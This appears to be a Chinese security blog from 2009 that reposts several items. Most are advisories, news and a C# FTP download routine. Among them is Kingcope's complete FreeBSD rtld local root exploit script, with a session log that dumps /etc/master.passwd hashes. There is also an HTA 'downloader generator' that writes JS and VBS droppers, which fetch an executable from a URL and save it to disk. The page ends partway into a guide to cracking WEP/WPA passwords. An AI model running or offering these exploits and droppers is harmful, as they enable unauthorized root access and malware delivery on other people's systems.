差不多該關了
對吧?!
2009年12月5日 星期六
Security Advisory for Adobe Flash Player
Security Advisory for Adobe Flash Player
Release date: December 3, 2009Vulnerability identifier: APSB09-19
Platform: All Platforms
Summary
Adobe is planning to release an update for Adobe Flash Player 10.0.32.18 and earlier versions, and an update to Adobe AIR 1.5.2 and earlier versions, to resolve critical security issues. Adobe expects to make these updates available on December 8, 2009.Users may monitor the latest information on the Adobe Product Security Incident Response Team blog at the following URL: http://blogs.adobe.com/psirt or by subscribing to the RSS feed here: http://blogs.adobe.com/psirt/atom.xml.
(Note: This Security Advisory will be replaced with the final Security Bulletin upon release on December 8, 2009.)
Affected software versions
Adobe Flash Player 10.0.32.18 and earlier versions
Adobe AIR 1.5.2 and earlier versionsSeverity rating
Adobe categorizes these as critical updates.2009年12月3日 星期四
網絡安全信息與動態週報-2009年第2期
關於CNCERT
國家計算機網絡應急技術處理協調中心(簡稱國家互聯網應急中心,CNCERT/CC)成立於1999年9月,是工 業和信息化部領導下的國家級網絡安全應急機構,具體負責協調我國各計算機應急組織(CERT)共同處理國家公共互聯網上的緊急安全事件,為國家公共互聯 網、重要信息基礎設施以及關鍵部門提供計算機網絡安全監測、預警、應急、防範等服務和技術支持,收集、核實、彙總、發佈有關互聯網網絡安全的權威信息,組 織國內網絡安全應急組織參與國際網絡安全合作和交流等事宜。
網址:www.cert.org.cn
週報內容如下:
週報內容如下:
一、本週網絡安全基本態勢(11月23日-11月29日)
● 本週活躍惡意域名
● 本週活躍惡意代碼
● 本週重要漏洞
二、業界新聞速遞
● 政府監管和政策法規動態
● 網絡安全事件與威脅
● 業界動態
官網下載: 點擊下載 假使官網速度過慢 可嘗試本站下載
本站下載: 點擊下載
Fuzzing Reader - Lessons Learned
Fuzzing Reader - Lessons Learned
from ASSET (Adobe Secure Software Engineering Team)
FreeBSD local r00t zeroday
FreeBSD local r00t zeroday
在聖誕節即將到來的日子,以安全著稱的FreeBSD系統被著名黑客Kingcope爆了一個零日(0day)漏洞。據Kingcope所說,他長 期致力於挖掘FreeBSD系統的本地提權漏洞,終於有幸在近期發現了這個非常低級的本地提權漏洞;這個漏洞存在於FreeBSD的Run-Time Link-Editor(rtld)程序中,普通用戶可以通過該漏洞非常輕易的獲得root權限。該漏洞影響非常廣泛,包括FreeBSD 7.1至8.0的32及64位系統。
在展示該漏洞威力之前,我們科普一下著名黑客kingcope。從2007年6月至今,他一共公開了12個安全漏洞(沒公開的不知道有多少),其中 FreeBSD和Sun Solaris各兩個,微軟四個,Oracle、mysql、NcFTPD和nginx各一個,同時他還編寫了多個漏洞的攻擊代碼,例如 Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。
接下來我們在最新的FreeBSD 8.0中重現一下該漏洞的攻擊過程,請注意圖中的紅色部分;我們只要執行名為fbsd8localroot.sh的腳本,就可以輕易的獲得root權限。
From: Kingcope <kcope2 () googlemail com>
Date: Mon, 30 Nov 2009 23:12:20 +0100
在聖誕節即將到來的日子,以安全著稱的FreeBSD系統被著名黑客Kingcope爆了一個零日(0day)漏洞。據Kingcope所說,他長 期致力於挖掘FreeBSD系統的本地提權漏洞,終於有幸在近期發現了這個非常低級的本地提權漏洞;這個漏洞存在於FreeBSD的Run-Time Link-Editor(rtld)程序中,普通用戶可以通過該漏洞非常輕易的獲得root權限。該漏洞影響非常廣泛,包括FreeBSD 7.1至8.0的32及64位系統。
在展示該漏洞威力之前,我們科普一下著名黑客kingcope。從2007年6月至今,他一共公開了12個安全漏洞(沒公開的不知道有多少),其中 FreeBSD和Sun Solaris各兩個,微軟四個,Oracle、mysql、NcFTPD和nginx各一個,同時他還編寫了多個漏洞的攻擊代碼,例如 Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。
接下來我們在最新的FreeBSD 8.0中重現一下該漏洞的攻擊過程,請注意圖中的紅色部分;我們只要執行名為fbsd8localroot.sh的腳本,就可以輕易的獲得root權限。
From: Kingcope <kcope2 () googlemail com>
Date: Mon, 30 Nov 2009 23:12:20 +0100
** FreeBSD local r00t 0day Discovered & Exploited by Nikolaos Rangos also known as Kingcope. Nov 2009 "BiG TiME" "Go fetch your FreeBSD r00tkitz" // http://www.youtube.com/watch?v=dDnhthI27Fg There is an unbelievable simple local r00t bug in recent FreeBSD versions. I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out. The bug resides in the Run-Time Link-Editor (rtld). Normally rtld does not allow dangerous environment variables like LD_PRELOAD to be set when executing setugid binaries like "ping" or "su". With a rather simple technique rtld can be tricked into accepting LD variables even on setugid binaries. See the attached exploit for details. Example exploiting session ********************************** %uname -a;id; FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386 uid=1001(kcope) gid=1001(users) groups=1001(users) %./w00t.sh FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # uname -a;id; FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386 uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users) # cat /etc/master.passwd # $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ # root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root: daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5::0:0:System &:/:/usr/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User &:/home/kcope:/bin/sh # Systems tested/affected ********************************** FreeBSD 8.0-RELEASE *** VULNERABLE FreeBSD 7.1-RELEASE *** VULNERABLE FreeBSD 6.3-RELEASE *** NOT VULN FreeBSD 4.9-RELEASE *** NOT VULN
*EXPLOIT*
#!/bin/sh echo ** FreeBSD local r00t zeroday echo by Kingcope echo November 2009 cat > env.c << _EOF #include <stdio.h> main() { extern char **environ; environ = (char**)malloc(8096); environ[0] = (char*)malloc(1024); environ[1] = (char*)malloc(1024); strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0"); execl("/sbin/ping", "ping", 0); } _EOF gcc env.c -o env cat > program.c << _EOF #include <unistd.h> #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { extern char **environ; environ=NULL; system("echo ALEX-ALEX;/bin/sh"); } _EOF gcc -o program.o -c program.c -fPIC gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles cp w00t.so.1.0 /tmp/w00t.so.1.0 ./env
註: 本文轉載自網路 非原創
轉載自 Insecure.Org 素包子2009年12月2日 星期三
找回誤刪並已清除的資源回收桶文件
步驟:
1、單擊「開始——運行,然後輸入regedit (打開註冊表)
2、依次展開:
HEKEY——LOCAL——MACHIME/SOFTWARE/
microsoft/WINDOWS/CURRENTVERSION/
EXPLORER/DESKTOP /NAMESPACE
在左邊空白外點擊「新建」,選擇:「主鍵」,把它命名為「645FFO40——5081——101B——9F08—— 00AA002F954E」再把右邊的「默認」的主鍵的鍵值設為「回收站」,然後退出註冊表。就OK啦。
3、要重啟你的計算機。
只要你機器沒有運行過磁盤整理。系統完好.任何時候的文件都可以找回來
1、單擊「開始——運行,然後輸入regedit (打開註冊表)
2、依次展開:
HEKEY——LOCAL——MACHIME/SOFTWARE/
microsoft/WINDOWS/CURRENTVERSION/
EXPLORER/DESKTOP /NAMESPACE
在左邊空白外點擊「新建」,選擇:「主鍵」,把它命名為「645FFO40——5081——101B——9F08—— 00AA002F954E」再把右邊的「默認」的主鍵的鍵值設為「回收站」,然後退出註冊表。就OK啦。
3、要重啟你的計算機。
只要你機器沒有運行過磁盤整理。系統完好.任何時候的文件都可以找回來
註: 本文轉載自網路 非原創
轉載自 Yezi 原文2009年12月1日 星期二
C#實現FTP下載代碼(含續傳與進度列)
最近在學習C#程式語言
於是乎模仿了網路上的範例
依樣畫葫蘆寫個FTP的下載代碼(含續傳、進度顯示)
以上模仿參考至黑暗執行緒前輩的文章
相當讚的部落格!使我獲益良多
文章一 文章二
如有侵權我會立刻刪除!
於是乎模仿了網路上的範例
依樣畫葫蘆寫個FTP的下載代碼(含續傳、進度顯示)
private void Download(string filePath, string fileName) { FtpWebRequest ftpReq; //宣告FTP連線 ftpReq = (FtpWebRequest)FtpWebRequest.Create(new Uri("ftp://" + IpAdd + "/" + fileName)); //取得欲下載檔案的大小(位元)存至 fiesize ftpReq.Method = WebRequestMethods.Ftp.GetFileSize; //認證 ftpReq.Credentials = new NetworkCredential(UName, UPWord); int filesize = (int)ftpReq.GetResponse().ContentLength; //宣告FTP連線 ftpReq = (FtpWebRequest)FtpWebRequest.Create(new Uri("ftp://" + IpAdd + "/" + fileName)); //下載 ftpReq.Method = WebRequestMethods.Ftp.DownloadFile; //認證 ftpReq.Credentials = new NetworkCredential(UName, UPWord); //binaary ftpReq.UseBinary = true; //進度列初始化 progressBar1.Value = 0; progressBar1.Maximum = filesize; lbProgress.Text = "0/" + filesize.ToString(); //支援續傳 FileInfo fi = new FileInfo(filePath + "\\" + fileName); FileStream fs = null; //檢測是否已有相同檔名的存在於client端 if (fi.Exists) { //若存在,由中斷點繼續傳輸 ftpReq.ContentOffset = fi.Length; //.apend 檔案存在時開啟檔案至末端 or 建立新檔 fs = new FileStream(filePath + "\\" + fileName, FileMode.Append); } else //client端無檔案 則重新建立新檔 fs = new FileStream(filePath + "\\" + fileName, FileMode.Create); //建立ftp連線 FtpWebResponse ftpResp = (FtpWebResponse)ftpReq.GetResponse(); bool bfinish = false; try { //取得下載用的stream物件 //ftpResp.GetResponseStream()--->擷取包含從FTP server傳送之回應資料的資料流 using (Stream stm = ftpResp.GetResponseStream()) { //以block方式多批寫入 byte[] buff = new byte[5]; //讀data int len = 0; while (fs.Length < filesize) { //取得長度 len = stm.Read(buff, 0, buff.Length); fs.Write(buff, 0, len); //更新 progress bar if (progressBar1.Value + len <= progressBar1.Maximum) { progressBar1.Value += len; lbProgress.Text = "傳輸中... " + progressBar1.Value.ToString() + "/" + filesize.ToString(); progressBar1.Refresh(); Application.DoEvents(); } //傳完 if (fs.Length == filesize) { progressBar1.Value = progressBar1.Maximum; lbProgress.Text = "傳輸成功! " + filesize.ToString() + "/" + filesize.ToString(); } } fs.Flush(); //傳完,bfinish = true //清除資料流的緩衝區 bfinish = (fs.Length == filesize); fs.Close(); stm.Close(); } } catch (System.Net.WebException we) { //若未傳完才要觸發 exception if (!bfinish) throw we; } ftpResp.Close(); }
以上模仿參考至黑暗執行緒前輩的文章
相當讚的部落格!使我獲益良多
文章一 文章二
如有侵權我會立刻刪除!
2009年11月30日 星期一
網絡安全信息與動態週報-2009年第1期
關於CNCERT
國家計算機網絡應急技術處理協調中心(簡稱國家互聯網應急中心,CNCERT/CC)成立於1999年9月,是工業和信息化部領導下的國家級網絡安全應急機構,具體負責協調我國各計算機應急組織(CERT)共同處理國家公共互聯網上的緊急安全事件,為國家公共互聯網、重要信息基礎設施以及關鍵部門提供計算機網絡安全監測、預警、應急、防範等服務和技術支持,收集、核實、彙總、發佈有關互聯網網絡安全的權威信息,組織國內網絡安全應急組織參與國際網絡安全合作和交流等事宜。
網址:www.cert.org.cn
週報內容如下:
一、本週網絡安全基本態勢(11月16日-11月22日)
● 本週活躍惡意域名
● 本週活躍惡意代碼
● 本週重要漏洞
二、業界新聞速遞
● 政府監管和政策法規動態
● 網絡安全事件與威脅
● 業界動態
官網下載: 點擊下載 假使官網速度過慢 可嘗試本站下載
本站下載: 點擊下載
2009年11月27日 星期五
XMLDOM下載者生成器(xmldown.hta)
以下代碼保存成hta文件,可生成js和vbs下載者
<HTA:APPLICATION
ID="xmldown"
Caption="yes"
SCROLL="auto"
border="none"
borderStyle="static"
SINGLEINSTANCE="yes"
maximizebutton="no"
BORDER="no"
icon="dxdiag.exe">
<script language=vbs>
Sub Window_onLoad
window.resizeTo screen.width/1.6,screen.height/3
window.moveTo 200,200
End Sub
Sub CreateXml(path,File)
Set objStream = CreateObject("ADODB.Stream")
objStream.Type = 1
objStream.Open()
objStream.LoadFromFile(Path)
objStream.position = 0
Set XmlDoc = CreateObject("Microsoft.XMLDOM")
XmlDoc.async = False
Set Root = XmlDoc.createProcessingInstruction("xml", "version='1.0' encoding='UTF-8'")
XmlDoc.appendChild(Root)
XmlDoc.appendChild(XmlDoc.CreateElement("root"))
Set Xfile = XmlDoc.SelectSingleNode("//root").AppendChild(XmlDoc.CreateElement("file"))
Set Xstream = Xfile.AppendChild(XmlDoc.CreateElement("stream"))
Xstream.SetAttribute "xmlns:dt", "urn:schemas-microsoft-com:datatypes"
Xstream.dataType = "bin.base64"
Xstream.nodeTypedValue = objStream.Read()
XmlDoc.Save(File)
Set XmlDoc = Nothing
Set Root = Nothing
Set objStream=Nothing
End Sub
Function x(obj)
Set x=document.getElementById(obj)
End function
Function Findfile(str)
Set FSO = CreateObject("Scripting.FileSystemObject")
If FSO.FileExists(str) Then
findfile=true
Else
findfile=false
End If
End Function
Function jsdown()
Set FSO = CreateObject("Scripting.FileSystemObject")
with fso.opentextfile((CreateObject("WScript.Shell")).CurrentDirectory&"\jsdown.js",2,true)
.write x("jsdown").value
end with
end function
Function vbsdown()
Set FSO = CreateObject("Scripting.FileSystemObject")
with fso.opentextfile((CreateObject("WScript.Shell")).CurrentDirectory&"\vbsdown.vbs",2,true)
.write x("vbsdown").value
end with
end function
</script>
<body>
<h4>1.生成下載用的xml文件</h4>
選擇下載的exe文件:<input type=file name="file1" id="file1" size="20">
保存路徑 <input type=text name="path" id="pathname" value="c:\down.xml" size="20">
<input type="button" value="生成xml文件" onclick='vbs:CreateXml x("file1").value,x("pathname").value:If Findfile(x("pathname").value) = true Then msgbox("生成成功,請傳到某個空間"):x("url").innerHTML="<font color=red>生成成功,請傳到某個空間</font>"'> <br>
<h4>2.生成下載者</h4>
<button onclick='vbs:jsdown():If Findfile("jsdown.js") = true Then msgbox "生成成功":x("url").innerHTML="用法是cscript jsdown.js xmlurl savepath"' >生成js下載者</button><button onclick='vbs:vbsdown():If Findfile("vbsdown.vbs") = true Then msgbox "生成成功":x("url").innerHTML="<font color=blue>用法是cscript vbsdown.js xmlurl savepath</font>"'>生成vbs下載者< /button><br><br><br><br>
<div id="url"></div>
<textarea style="visibility:hidden" name=jswodn id=jsdown rows="1" cols="1">
var objArgs = WScript.Arguments;
var objXmlFile =new ActiveXObject("Microsoft.XMLDOM");
objXmlFile.async=false;
objXmlFile.load(objArgs(0).toLowerCase());
do
{
WScript.sleep(100);
}
while (!objXmlFile.readyState == 4)
if (objXmlFile.readyState == 4)
{
var objStream = new ActiveXObject("ADODB.Stream")
var objNodeList =objXmlFile.getElementsByTagName("stream")[0].nodeTypedValue
with(objStream)
{
objStream.Type = 1;
objStream.Open();
objStream.Write(objNodeList);
objStream.SaveToFile(objArgs(1).toLowerCase(),2);
objStream.close();
}
}
delete objXmlFile;
delete objStream;
</textarea>
<textarea style="visibility:hidden" name=vbswodn id=vbsdown rows="1" cols="1">
Set objXmlFile = CreateObject("Microsoft.XMLDOM")
objXmlFile.async=false
objXmlFile.load(Wscript.arguments(0))
Do While objXmlFile.readyState<>4
wscript.sleep 100
Loop
If objXmlFile.readyState = 4 Then
Set objNodeList = objXmlFile.documentElement.selectNodes("//file/stream")
Set objStream = CreateObject("ADODB.Stream")
With objStream
.Type = 1
.Open
.Write objNodeList(0).nodeTypedvalue
.SaveToFile Wscript.arguments(1), 2
.Close
End With
Set objStream = Nothing
End If
Set objXmlFile = Nothing
</textarea>
</body>
註: 本文轉載自網路 非原創
轉載自 teN.potgnayiaH.wwW vbs小鋪 原文用 XMLDOM 和 ADODB.Stream 實現base64編碼解碼
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title> 用 XMLDOM 和 ADODB.Stream 實現base64編碼解碼 </title> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <style type="text/css" title=""> #textarea1,#textarea3,#textarea5 { background-color: #EEEEEE; } </style> </head> <body> <h3>用 XMLDOM 和 ADODB.Stream 實現base64編碼解碼</h3> <h5>By: CuiXiPing(無心)</h5> <h4>1.對文件的base64編碼</h4> <input type=file name="file1" id="file1" size="50"> <input type="button" value="base64編碼" onclick="if(!file1.value){alert('請選擇文件 ')}else{textarea1.value=Base64EncodeFile(file1.value)}"> <br> <textarea id="textarea1" rows="6" cols="80" readOnly></textarea> <h4>2.對文本的base64編碼</h4> <input type="button" value="base64編碼" onclick="textarea3.value=Base64EncodeText(textarea2.value)"> <br> <textarea id="textarea2" rows="4" cols="40">堅決抵制日貨</textarea> <textarea id="textarea3" rows="4" cols="40" readOnly></textarea> <h4>3.對文本的base64解碼</h4> <input type="button" value="base64解碼" onclick="textarea5.value=Base64DecodeText(textarea4.value)"> <br> <textarea id="textarea4" rows="4" cols="40">vOG+9rXW1sbI1bv1</textarea> <textarea id="textarea5" rows="4" cols="40" readOnly></textarea> <script language="javaScript"> <!-- function Base64EncodeFile(fileSpec){ var xml_dom = new ActiveXObject("MSXML2.DOMDocument"); var ado_stream = new ActiveXObject("ADODB.Stream"); var tmpNode = xml_dom.createElement("tmpNode"); tmpNode.dataType = "bin.base64"; ado_stream.Type = 1; // 1=adTypeBinary if(ado_stream.state==0){ // 0=adStateClosed 1=adStateOpen ado_stream.Open(); } ado_stream.LoadFromFile(fileSpec); tmpNode.nodeTypedValue = ado_stream.Read(-1); // -1=adReadAll ado_stream.Close(); return tmpNode.text; } function Base64EncodeText(TextStr){ var xml_dom = new ActiveXObject("MSXML2.DOMDocument"); var ado_stream = new ActiveXObject("ADODB.Stream"); var tmpNode = xml_dom.createElement("tmpNode"); tmpNode.dataType = "bin.base64"; ado_stream.Charset = "gb2312"; ado_stream.Type = 2; // 1=adTypeBinary 2=adTypeText if(ado_stream.state==0){ // 0=adStateClosed 1=adStateOpen ado_stream.Open(); } ado_stream.WriteText(TextStr); ado_stream.Position = 0; ado_stream.Type = 1; // 1=adTypeBinary 2=adTypeText tmpNode.nodeTypedValue = ado_stream.Read(-1); // -1=adReadAll ado_stream.Close(); return tmpNode.text; } function Base64DecodeText(Base64Str){ var xml_dom = new ActiveXObject("MSXML2.DOMDocument"); var ado_stream = new ActiveXObject("ADODB.Stream"); var tmpNode = xml_dom.createElement("tmpNode"); tmpNode.dataType = "bin.base64"; tmpNode.text = Base64Str; ado_stream.Charset = "gb2312"; ado_stream.Type = 1; // 1=adTypeBinary 2=adTypeText ado_stream.Open(); ado_stream.Write(tmpNode.nodeTypedValue); ado_stream.Position = 0; ado_stream.Type = 2; // 1=adTypeBinary 2=adTypeText var str = ado_stream.ReadText(-1); // -1=adReadAll ado_stream.Close(); return str; } //--> </script> </body> </html>
註: 本文轉載自網路 非原創
轉載自 teN.potgnayiaH.wwW vbs小鋪 原文2009年11月25日 星期三
Top Standalone Antivirus Software for 2010
We looked at eleven antivirus packages from around the world. G-Data Antivirus 2010 wins for its outstanding malware detection; Norton Antivirus 2010 comes in a close second thanks to its polished interface.
Edited by Nick Mediati, PC World
1. G-Data Antivirus 2010
2. Symantec Norton Antivirus 2010
3. Kaspersky Lab Anti-Virus 2010
4. BitDefender Antivirus 2010
5. Panda Antivirus Pro 2010
6. F-Secure Anti-Virus 2010
7. Avira AntiVir Premium
8. Trend Micro AntiVirus Plus AntiSpyware 2010
9. Eset Nod32 Antivirus 4
10. McAfee Antivirus Plus 2010
11. Alwil Avast! 4.8 Professional Edition
註: 本文轉載自網路 非原創
轉載自 PCWorld 原文2009年11月24日 星期二
PHP 5.3.1 Released!
The PHP development team would like to announce the immediate availability of PHP 5.3.1.
This release focuses on improving the stability of the PHP 5.3.x branch with over 100 bug fixes, some of which are security related. All users of PHP are encouraged to upgrade to this release.
Security Enhancements and Fixes in PHP 5.3.1:
- Added "max_file_uploads" INI directive, which can be set to limit the number of file uploads per-request to 20 by default, to prevent possible DOS via temporary file exhaustion.
- Added missing sanity checks around exif processing.
- Fixed a safe_mode bypass in tempnam().
- Fixed a open_basedir bypass in posix_mkfifo().
- Fixed failing safe_mode_include_dir.
註: 本文轉載自網路 非原創
轉載自 PHP 原文Microsoft Internet Explorer CSS 遠程代碼執行漏洞
前幾天有發佈簡易的
再發一篇較清楚點的訊息
內容是中文的
有興趣的也可以從連結或是自行連至微軟網站觀看詳細的訊息資料
正文開始:
安全漏洞:CN-VA09-113
發佈日期:2009年11月24日
漏洞類型:遠程執行代碼
漏洞評估:嚴重
受影響的軟件:
Windows XP、Windows Server 2003、Windows Vista及Windows Server 2008操作系統上的IE6及IE7,Microsoft Windows 2000 Service Pack 4上的Explorer 6 Service Pack 1。
不受影響的軟件:
IE8
漏洞描述:
微軟公司IE瀏覽器存在「STYLE對象錯誤引用」高危安全漏洞,遠程攻擊者可利用此漏洞誘使用戶訪問惡意網頁,進而在用戶系統上可執行任意指令。漏洞信息詳細描述:當用戶訪問了設置為特定屬性的CSS STYLE對象時,會導致函數調用流程發生變化,攻擊者從而可以獲取用戶系統權限。受影響的系統包括IE 6和IE7。該漏洞利用較為簡單,漏洞信息和攻擊代碼已公開,微軟公司尚未發佈針對該漏洞的補丁程序。CNCERT建議廣大互聯網用戶暫時禁用IE的 JavaScript功能,直至官方提供相應的補丁。如發現有關攻擊活動請及時與CNCERT聯繫。
參考信息:
http://www.microsoft.com/technet/security/advisory/977981.mspx
http://www.vupen.com/english/advisories/2009/3301
http://sec.chinabyte.com/192/11040192.shtml
http://www.anqn.com/changshang/jinshan/2009-11-25/a09120296.shtml
信息提供者:
微軟
其它信息:
相關CVE編號:
CVE-2009-3762
漏洞報告文檔編寫:
CNCERT/CC
安全公告文檔編寫:
CNCERT/CC
-----------------------------------------------------------------------------------
CNCERT/CC在發佈安全公告信息之前,都力爭保證每條公告的準確性和可靠性。然而,採納和實施公告中的建議則完全由用戶自己決定,其可能引起的問題和結果也完全由用戶承擔。是否採納我們的建議取決於您個人或您企業的決策,您應考慮其內容是否符合您個人或您企業的安全策略和流程。
在任何情況下,如果您確信您的計算機系統受到危害或是攻擊,我們鼓勵您及時告知國家計算機網絡應急技術處理協調中心:http://www.cert.org.cn/servlet/Incident
同時,我們也鼓勵所有計算機與網絡安全研究機構,包括廠商和科研院所,向我們報告貴單位所發現的漏洞信息。我們將對所有漏洞信息進行驗證並在CNCERT/CC網站公佈漏洞信息及指導受影響用戶採取措施以避免損失。
再發一篇較清楚點的訊息
內容是中文的
有興趣的也可以從連結或是自行連至微軟網站觀看詳細的訊息資料
正文開始:
安全漏洞:CN-VA09-113
發佈日期:2009年11月24日
漏洞類型:遠程執行代碼
漏洞評估:嚴重
受影響的軟件:
Windows XP、Windows Server 2003、Windows Vista及Windows Server 2008操作系統上的IE6及IE7,Microsoft Windows 2000 Service Pack 4上的Explorer 6 Service Pack 1。
不受影響的軟件:
IE8
漏洞描述:
微軟公司IE瀏覽器存在「STYLE對象錯誤引用」高危安全漏洞,遠程攻擊者可利用此漏洞誘使用戶訪問惡意網頁,進而在用戶系統上可執行任意指令。漏洞信息詳細描述:當用戶訪問了設置為特定屬性的CSS STYLE對象時,會導致函數調用流程發生變化,攻擊者從而可以獲取用戶系統權限。受影響的系統包括IE 6和IE7。該漏洞利用較為簡單,漏洞信息和攻擊代碼已公開,微軟公司尚未發佈針對該漏洞的補丁程序。CNCERT建議廣大互聯網用戶暫時禁用IE的 JavaScript功能,直至官方提供相應的補丁。如發現有關攻擊活動請及時與CNCERT聯繫。
參考信息:
http://www.microsoft.com/technet/security/advisory/977981.mspx
http://www.vupen.com/english/advisories/2009/3301
http://sec.chinabyte.com/192/11040192.shtml
http://www.anqn.com/changshang/jinshan/2009-11-25/a09120296.shtml
信息提供者:
微軟
其它信息:
相關CVE編號:
CVE-2009-3762
漏洞報告文檔編寫:
CNCERT/CC
安全公告文檔編寫:
CNCERT/CC
-----------------------------------------------------------------------------------
CNCERT/CC在發佈安全公告信息之前,都力爭保證每條公告的準確性和可靠性。然而,採納和實施公告中的建議則完全由用戶自己決定,其可能引起的問題和結果也完全由用戶承擔。是否採納我們的建議取決於您個人或您企業的決策,您應考慮其內容是否符合您個人或您企業的安全策略和流程。
在任何情況下,如果您確信您的計算機系統受到危害或是攻擊,我們鼓勵您及時告知國家計算機網絡應急技術處理協調中心:http://www.cert.org.cn/servlet/Incident
同時,我們也鼓勵所有計算機與網絡安全研究機構,包括廠商和科研院所,向我們報告貴單位所發現的漏洞信息。我們將對所有漏洞信息進行驗證並在CNCERT/CC網站公佈漏洞信息及指導受影響用戶採取措施以避免損失。
註: 本文轉載自網路 非原創
轉載自 網絡安全資訊與受理平台 原文2009年11月23日 星期一
PHP漏洞代碼可以自我植入GIF文件中
根據SANS研究院互聯網風暴中心(ISC)的一篇博客文章介紹,PHP漏洞代碼在GIF文件開始部分合法圖像的幫助下可以簡單的逃過網站的防禦。SANS安全博客寫到「這是傳遞漏洞代碼到其它地方的一種精明的方法,通過旁路網絡安全工具根本不會引發警報或引起注意。」
惡意攻擊者可以將PHP漏洞代碼植入一個圖形文件中。PHP是經常用來開放動態網站的一種編程語言。
SANS研究院首席研究員Johannes Ullrich說到:「一旦這種類型的惡意GIF文件被上傳到服務器後,通過遠程在該系統上部署更多的漏洞代碼可能會造成嚴重的破壞。」
當用戶下載並瀏覽圖片時,服務器解析PHP代碼然後漏洞代碼就會被執行。
Ullrich表示,在過去的六個月中,這種技術突然出現時主要發生在小型家庭網站上,最近更多的發生在大型圖片庫網站上。
惡意攻擊者可以將PHP漏洞代碼植入一個圖形文件中。PHP是經常用來開放動態網站的一種編程語言。
SANS研究院首席研究員Johannes Ullrich說到:「一旦這種類型的惡意GIF文件被上傳到服務器後,通過遠程在該系統上部署更多的漏洞代碼可能會造成嚴重的破壞。」
當用戶下載並瀏覽圖片時,服務器解析PHP代碼然後漏洞代碼就會被執行。
Ullrich表示,在過去的六個月中,這種技術突然出現時主要發生在小型家庭網站上,最近更多的發生在大型圖片庫網站上。
註: 本文轉載自網路 非原創
轉載自 51CTO.COM 原文用 BT3 破解無線網絡WEP,WPA密碼
大家不要看WEP生成的密碼那麼多位,其實破解起來快的話,10分鐘就出來了,所以最好還是做些安全措施吧
下邊是命令行格式,估計很多朋友看不懂,只是留給需要的人,迫不及待的朋友請往下拉!
1、準備工作
一台電腦 或者 一台筆記本電腦
一塊無線網卡(或者筆記本內置無線網卡)
1G的U盤,Vmware,刻錄機三者有其一即可(推薦用U盤)
以下兩個列表分別是經過測試可用BT3進行破解無線網絡的無線網卡和筆記本,請大家對照一下,其實沒有你自己網卡的型號也無所謂,可以試一下,因為自己在電腦店打工,隨便拿了一台也沒管是啥型號的就破解成功了。汗一下~~~
筆記本型號
http://backtrack.offensive-security.com/index.php/HCL:Laptops
網卡型號
http://backtrack.offensive-security.com/index.php/HCL:Wireless
2、下載BT3或BT4
BT3全稱Back Track 3,這是一個linux環境的便攜系統,可以放到U盤或者光盤中啟動,對本身硬盤沒有影響,無需在本地安裝,現在已經有BT4的BETA版了,喜歡嘗鮮的朋友可以試一下
是圈內非常著名的黑客攻擊平台,說白了就是一個封裝好的Linux操作系統,內置大量的網絡安全檢測工具以及黑客破解軟件等。BT3因可以方便的破解無線網絡而出名,其中內置的spoonwep是一個非常強悍的圖形化破解WEP無線網絡密碼的工具。
官方網站
http://www.remote-exploit.org/
BT3, BT4下載地址鏈接
http://www.remote-exploit.org/backtrack_download.html
其中有ISO格式,U盤格式,還有虛擬機Vmware格式的,大家各取所需,這裡我用的是U盤版(工具比較全),為什麼?大家沒看到那個Extended麼?
3、下載Spoonwep2
